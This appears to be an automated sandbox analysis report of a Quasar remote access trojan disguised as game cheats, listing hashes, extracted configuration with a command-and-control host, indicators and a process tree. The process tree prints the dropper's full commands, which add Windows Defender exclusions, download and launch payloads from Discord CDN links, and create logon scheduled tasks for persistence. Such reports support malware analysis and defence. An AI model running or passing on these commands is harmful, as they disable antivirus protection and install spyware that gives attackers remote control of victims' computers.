quasar | 05f1ffa1ec36931cc7eea37bec05882e59b185e237b4832fc0abe393dd5e0519

Analysis

max time kernel
91s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-en-20220112
submitted
05-03-2022 16:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

05F1FFA1EC36931CC7EEA37BEC05882E59B185E237B48.exe
Size

109KB
MD5

1755e55d32771a3d51e049ef4ee9f7ef
SHA1

bbfcea2e25a843d2d2c4023ed026809c0a173e88
SHA256

05f1ffa1ec36931cc7eea37bec05882e59b185e237b4832fc0abe393dd5e0519
SHA512

be18e1db9cfa88a41d3cf8945399d16aa145b905687a78324f0fb4cbea94a4d7dc6354975ab938fb2e9ab30469ac47f9ce3858485a132bd5354cafd0920cc328

Score

10^/10

quasar cheats spyware trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/935052169835593748/936336201043042364/MarsisESP.sln

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/935052169835593748/935052475730391070/Cheats.exe

Extracted

Family

quasar

Version

1.4.0

Botnet

Cheats

anubisgod.duckdns.org:1338

Mutex

6f2a7175-754c-4ce5-a610-2f8866732c05

Attributes

encryption_key
0411D8B9B23547F86733347B0634010F112E158F
install_name
dlscord.exe
log_directory
dlscordLogs
reconnect_delay
3000
startup_key
dlscord
subdirectory
dlscord

Signatures

Quasar Payload 5 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\Cheats.exe	family_quasar
C:\Users\Admin\AppData\Roaming\Cheats.exe	family_quasar
behavioral2/memory/1084-202-0x0000000000930000-0x0000000000BFA000-memory.dmp	family_quasar
C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe	family_quasar
C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe	family_quasar

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

34 3584 powershell.exe
35 1384 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

Cheats.exedlscord.exe

pid process

1084 Cheats.exe
3556 dlscord.exe
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

47 api.ipify.org
48 api.ipify.org
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1908 schtasks.exe
1132 schtasks.exe

flow	pid	process
34	3584	powershell.exe
35	1384	powershell.exe

pid	process
1084	Cheats.exe
3556	dlscord.exe

flow	ioc
47	api.ipify.org
48	api.ipify.org

pid	process
1908	schtasks.exe
1132	schtasks.exe

Modifies registry class 2 IoCs

Processes:

powershell.exeOpenWith.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings	OpenWith.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
456	powershell.exe
456	powershell.exe
1528	powershell.exe
1528	powershell.exe
3584	powershell.exe
3584	powershell.exe
1384	powershell.exe
1384	powershell.exe
3420	powershell.exe
3420	powershell.exe
3692	powershell.exe
3692	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeCheats.exedlscord.exe

description	pid	process
Token: SeDebugPrivilege	456	powershell.exe
Token: SeDebugPrivilege	1528	powershell.exe
Token: SeDebugPrivilege	3584	powershell.exe
Token: SeDebugPrivilege	1384	powershell.exe
Token: SeDebugPrivilege	3420	powershell.exe
Token: SeDebugPrivilege	3692	powershell.exe
Token: SeDebugPrivilege	1084	Cheats.exe
Token: SeDebugPrivilege	3556	dlscord.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

OpenWith.exedlscord.exe

pid process

1712 OpenWith.exe
3556 dlscord.exe

pid	process
1712	OpenWith.exe
3556	dlscord.exe

Suspicious use of WriteProcessMemory 29 IoCs

Processes:

05F1FFA1EC36931CC7EEA37BEC05882E59B185E237B48.execmd.exepowershell.exeCheats.exedlscord.exe

description	pid	process	target process
PID 3500 wrote to memory of 1884	3500	05F1FFA1EC36931CC7EEA37BEC05882E59B185E237B48.exe	cmd.exe
PID 3500 wrote to memory of 1884	3500	05F1FFA1EC36931CC7EEA37BEC05882E59B185E237B48.exe	cmd.exe
PID 3500 wrote to memory of 1884	3500	05F1FFA1EC36931CC7EEA37BEC05882E59B185E237B48.exe	cmd.exe
PID 1884 wrote to memory of 456	1884	cmd.exe	powershell.exe
PID 1884 wrote to memory of 456	1884	cmd.exe	powershell.exe
PID 1884 wrote to memory of 456	1884	cmd.exe	powershell.exe
PID 1884 wrote to memory of 1528	1884	cmd.exe	powershell.exe
PID 1884 wrote to memory of 1528	1884	cmd.exe	powershell.exe
PID 1884 wrote to memory of 1528	1884	cmd.exe	powershell.exe
PID 1884 wrote to memory of 3584	1884	cmd.exe	powershell.exe
PID 1884 wrote to memory of 3584	1884	cmd.exe	powershell.exe
PID 1884 wrote to memory of 3584	1884	cmd.exe	powershell.exe
PID 1884 wrote to memory of 1384	1884	cmd.exe	powershell.exe
PID 1884 wrote to memory of 1384	1884	cmd.exe	powershell.exe
PID 1884 wrote to memory of 1384	1884	cmd.exe	powershell.exe
PID 1884 wrote to memory of 3420	1884	cmd.exe	powershell.exe
PID 1884 wrote to memory of 3420	1884	cmd.exe	powershell.exe
PID 1884 wrote to memory of 3420	1884	cmd.exe	powershell.exe
PID 1884 wrote to memory of 3692	1884	cmd.exe	powershell.exe
PID 1884 wrote to memory of 3692	1884	cmd.exe	powershell.exe
PID 1884 wrote to memory of 3692	1884	cmd.exe	powershell.exe
PID 3692 wrote to memory of 1084	3692	powershell.exe	Cheats.exe
PID 3692 wrote to memory of 1084	3692	powershell.exe	Cheats.exe
PID 1084 wrote to memory of 1132	1084	Cheats.exe	schtasks.exe
PID 1084 wrote to memory of 1132	1084	Cheats.exe	schtasks.exe
PID 1084 wrote to memory of 3556	1084	Cheats.exe	dlscord.exe
PID 1084 wrote to memory of 3556	1084	Cheats.exe	dlscord.exe
PID 3556 wrote to memory of 1908	3556	dlscord.exe	schtasks.exe
PID 3556 wrote to memory of 1908	3556	dlscord.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\05F1FFA1EC36931CC7EEA37BEC05882E59B185E237B48.exe
"C:\Users\Admin\AppData\Local\Temp\05F1FFA1EC36931CC7EEA37BEC05882E59B185E237B48.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3500

C:\Windows\SysWOW64\cmd.exe
cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/935052169835593748/936336201043042364/MarsisESP.sln', (Join-Path -Path ($pwd).path -ChildPath 'MarsisESP.sln'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/935052169835593748/935052475730391070/Cheats.exe', (Join-Path -Path $env:AppData -ChildPath 'Cheats.exe'))" & powershell "Start-Process -FilePath (Join-Path -Path ($pwd).path -ChildPath 'MarsisESP.sln')" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'Cheats.exe')" & exit
2⤵
- Suspicious use of WriteProcessMemory
PID:1884

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:456

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1528

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/935052169835593748/936336201043042364/MarsisESP.sln', (Join-Path -Path ($pwd).path -ChildPath 'MarsisESP.sln'))"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3584

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/935052169835593748/935052475730391070/Cheats.exe', (Join-Path -Path $env:AppData -ChildPath 'Cheats.exe'))"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1384

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "Start-Process -FilePath (Join-Path -Path ($pwd).path -ChildPath 'MarsisESP.sln')"
3⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3420

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'Cheats.exe')"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3692

C:\Users\Admin\AppData\Roaming\Cheats.exe
"C:\Users\Admin\AppData\Roaming\Cheats.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1084

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Cheats.exe" /rl HIGHEST /f
5⤵
- Creates scheduled task(s)
PID:1132

C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
"C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe"
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3556

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:1908

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1712

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
ad529cd3797b218a2dc6d76e686e91c9

SHA1
c7eb82ba4ed4774897f0cf7e077a0c1106c07b64

SHA256
bc8ff6f19763bf8829566b75683a7ba51f65f1b8a1894a01dd1da4a0ab832beb

SHA512
ebeda6f648b8d87913a6c27546acc06a1e6a96300462c7d667bc53a1b8d3aacb33953e4b46967d341ae0ebd3d5cdf544086df2b302605cdb3b82ff3121a29827

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
626051154d1b2f2b10480f5b4554b375

SHA1
c94750947c3502e2a8549582db344aaa2e562029

SHA256
4f55f2ef21aee617858339f7f1b9f5418c029868507833ef807bd2dfeb82235b

SHA512
6422814936bb5381cadd7ee120499e4c9d7277b998bde460525057aa7ce63db9448f49dd0b459629c3ac6375dd853a5aeb9ecbeba01806ce3161f1038b8269bf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
b11732f1329af17aa9eef73dcbddb635

SHA1
f2022790960281e291548c71823c02a5b47b17f8

SHA256
8cdace86cecea011055097f4bbde0b25dc9b66b721eb1ba2624d7706ffd3e8c3

SHA512
37a09c0191dcc65749e561590f2f4202a5f84107d4d8a84178f7356f77addb3b32bdbd0fa5b0e52f6effb53934aa92c52b64f03319ff814466f7c4a376d46e1a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
c68741bc9c6ab29522c130f673a153fd

SHA1
d337616376e4574576b0afea5e3be0618b571ca4

SHA256
b135262a1408ff4fc5b37facdc7acc75ff011e29657e68d2ee83e9e29a6b2aa8

SHA512
e810cb8b0d4909305f0a07f4a768d47ded49deef2333fd509e4e0784ef2d4163bf290d73ae164ca2c434135e48c2e9455b038bc5d4d60bc8ddab28e194d8cd72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
5cdbafae58605e5fed9038c1099138b5

SHA1
e0089129a5a7286302f5347307636817fed96ff0

SHA256
a3c3cf0fe65969c058cb9385db21fa167e9007d4f1f160efa1cc5d515af667e5

SHA512
34a5981aef9710cd960fc4c225ef292cfd72ffc8d53572052fda5856fe0e7dc8842bb0eeab78c005313b347cca2155919d7d639098a81f734b5c9c5ff7798b40

Download Submit
C:\Users\Admin\AppData\Local\Temp\MarsisESP.sln
MD5
e658136da872c2b9ac29f0f46173573a

SHA1
ebeecbceb60a88e3447e495e8e81a1e1631e557e

SHA256
b22bca6eac53caf0bd5cee01dc3da047868ff037dd55b779fc2c8561fe462ef2

SHA512
bd32892402d83d666f4680e942ad565241221c5a548a6b3f69924ea304b7e12263ca36289413483e3e2431ea7b289fc45b37227119b163a61585f7d6c3773c40

Download Submit
C:\Users\Admin\AppData\Roaming\Cheats.exe
MD5
c41aa4383be3c790c15b89ac0b52a046

SHA1
0544bd37de62b386fa2ad5d3511e30b6c62c7f97

SHA256
84f65ea0570ad0cb113671be14dfa4a7d0f04ebfa773d4f53103e401c39511d1

SHA512
b80fa1c3f88795762e6957b9ad639fc60778f5f00dbf0d8b9d8f038abd6dd5f68a8f558fcc64cde27a286884390ee9c7676b2aa7fa6f9e6a2bcfd96607aec5fc

Download Submit
C:\Users\Admin\AppData\Roaming\Cheats.exe
MD5
c41aa4383be3c790c15b89ac0b52a046

SHA1
0544bd37de62b386fa2ad5d3511e30b6c62c7f97

SHA256
84f65ea0570ad0cb113671be14dfa4a7d0f04ebfa773d4f53103e401c39511d1

SHA512
b80fa1c3f88795762e6957b9ad639fc60778f5f00dbf0d8b9d8f038abd6dd5f68a8f558fcc64cde27a286884390ee9c7676b2aa7fa6f9e6a2bcfd96607aec5fc

Download Submit
C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
MD5
c41aa4383be3c790c15b89ac0b52a046

SHA1
0544bd37de62b386fa2ad5d3511e30b6c62c7f97

SHA256
84f65ea0570ad0cb113671be14dfa4a7d0f04ebfa773d4f53103e401c39511d1

SHA512
b80fa1c3f88795762e6957b9ad639fc60778f5f00dbf0d8b9d8f038abd6dd5f68a8f558fcc64cde27a286884390ee9c7676b2aa7fa6f9e6a2bcfd96607aec5fc

Download Submit
C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
MD5
c41aa4383be3c790c15b89ac0b52a046

SHA1
0544bd37de62b386fa2ad5d3511e30b6c62c7f97

SHA256
84f65ea0570ad0cb113671be14dfa4a7d0f04ebfa773d4f53103e401c39511d1

SHA512
b80fa1c3f88795762e6957b9ad639fc60778f5f00dbf0d8b9d8f038abd6dd5f68a8f558fcc64cde27a286884390ee9c7676b2aa7fa6f9e6a2bcfd96607aec5fc

Download Submit
memory/456-140-0x0000000008070000-0x000000000808E000-memory.dmp

Filesize
120KB

Download
memory/456-132-0x0000000004A80000-0x0000000004AB6000-memory.dmp

Filesize
216KB

Download
memory/456-145-0x000000007F6E0000-0x000000007F6E1000-memory.dmp

Filesize
4KB

Download
memory/456-146-0x00000000099D0000-0x000000000A04A000-memory.dmp

Filesize
6.5MB

Download
memory/456-147-0x0000000009390000-0x00000000093AA000-memory.dmp

Filesize
104KB

Download
memory/456-148-0x0000000009400000-0x000000000940A000-memory.dmp

Filesize
40KB

Download
memory/456-149-0x0000000009620000-0x00000000096B6000-memory.dmp

Filesize
600KB

Download
memory/456-150-0x00000000095D0000-0x00000000095DE000-memory.dmp

Filesize
56KB

Download
memory/456-151-0x00000000096C0000-0x00000000096DA000-memory.dmp

Filesize
104KB

Download
memory/456-152-0x0000000009610000-0x0000000009618000-memory.dmp

Filesize
32KB

Download
memory/456-143-0x0000000070FD0000-0x000000007101C000-memory.dmp

Filesize
304KB

Download
memory/456-144-0x0000000008630000-0x000000000864E000-memory.dmp

Filesize
120KB

Download
memory/456-142-0x0000000009040000-0x0000000009072000-memory.dmp

Filesize
200KB

Download
memory/456-141-0x0000000006D35000-0x0000000006D37000-memory.dmp

Filesize
8KB

Download
memory/456-139-0x00000000072B0000-0x0000000007316000-memory.dmp

Filesize
408KB

Download
memory/456-138-0x0000000007230000-0x0000000007296000-memory.dmp

Filesize
408KB

Download
memory/456-137-0x0000000007090000-0x00000000070B2000-memory.dmp

Filesize
136KB

Download
memory/456-136-0x0000000006D32000-0x0000000006D33000-memory.dmp

Filesize
4KB

Download
memory/456-135-0x0000000006D30000-0x0000000006D31000-memory.dmp

Filesize
4KB

Download
memory/456-134-0x00000000751B0000-0x0000000075960000-memory.dmp

Filesize
7.7MB

Download
memory/456-133-0x0000000007370000-0x0000000007998000-memory.dmp

Filesize
6.2MB

Download
memory/1084-203-0x00007FFA6A450000-0x00007FFA6AF11000-memory.dmp

Filesize
10.8MB

Download
memory/1084-204-0x0000000001390000-0x0000000001392000-memory.dmp

Filesize
8KB

Download
memory/1084-202-0x0000000000930000-0x0000000000BFA000-memory.dmp

Filesize
2.8MB

Download
memory/1384-178-0x00000000751B0000-0x0000000075960000-memory.dmp

Filesize
7.7MB

Download
memory/1384-179-0x0000000004850000-0x0000000004851000-memory.dmp

Filesize
4KB

Download
memory/1384-180-0x0000000004852000-0x0000000004853000-memory.dmp

Filesize
4KB

Download
memory/1384-181-0x0000000004855000-0x0000000004857000-memory.dmp

Filesize
8KB

Download
memory/1528-163-0x000000007F710000-0x000000007F711000-memory.dmp

Filesize
4KB

Download
memory/1528-162-0x0000000004735000-0x0000000004737000-memory.dmp

Filesize
8KB

Download
memory/1528-161-0x0000000070FD0000-0x000000007101C000-memory.dmp

Filesize
304KB

Download
memory/1528-159-0x0000000004732000-0x0000000004733000-memory.dmp

Filesize
4KB

Download
memory/1528-158-0x0000000004730000-0x0000000004731000-memory.dmp

Filesize
4KB

Download
memory/1528-157-0x00000000751B0000-0x0000000075960000-memory.dmp

Filesize
7.7MB

Download
memory/3420-188-0x0000000007222000-0x0000000007223000-memory.dmp

Filesize
4KB

Download
memory/3420-189-0x0000000007225000-0x0000000007227000-memory.dmp

Filesize
8KB

Download
memory/3420-187-0x0000000007220000-0x0000000007221000-memory.dmp

Filesize
4KB

Download
memory/3420-186-0x00000000751B0000-0x0000000075960000-memory.dmp

Filesize
7.7MB

Download
memory/3556-210-0x000000001B1D0000-0x000000001B282000-memory.dmp

Filesize
712KB

Download
memory/3556-209-0x0000000002650000-0x00000000026A0000-memory.dmp

Filesize
320KB

Download
memory/3556-208-0x000000001B290000-0x000000001B292000-memory.dmp

Filesize
8KB

Download
memory/3556-207-0x00007FFA6A450000-0x00007FFA6AF11000-memory.dmp

Filesize
10.8MB

Download
memory/3584-172-0x0000000008C40000-0x0000000008C62000-memory.dmp

Filesize
136KB

Download
memory/3584-171-0x0000000000D05000-0x0000000000D07000-memory.dmp

Filesize
8KB

Download
memory/3584-170-0x0000000000D02000-0x0000000000D03000-memory.dmp

Filesize
4KB

Download
memory/3584-169-0x0000000000D00000-0x0000000000D01000-memory.dmp

Filesize
4KB

Download
memory/3584-168-0x00000000751B0000-0x0000000075960000-memory.dmp

Filesize
7.7MB

Download
memory/3584-173-0x0000000009F30000-0x000000000A4D4000-memory.dmp

Filesize
5.6MB

Download
memory/3692-201-0x00000000070B5000-0x00000000070B7000-memory.dmp

Filesize
8KB

Download
memory/3692-196-0x00000000070B2000-0x00000000070B3000-memory.dmp

Filesize
4KB

Download
memory/3692-195-0x00000000070B0000-0x00000000070B1000-memory.dmp

Filesize
4KB

Download
memory/3692-194-0x00000000751B0000-0x0000000075960000-memory.dmp

Filesize
7.7MB

Download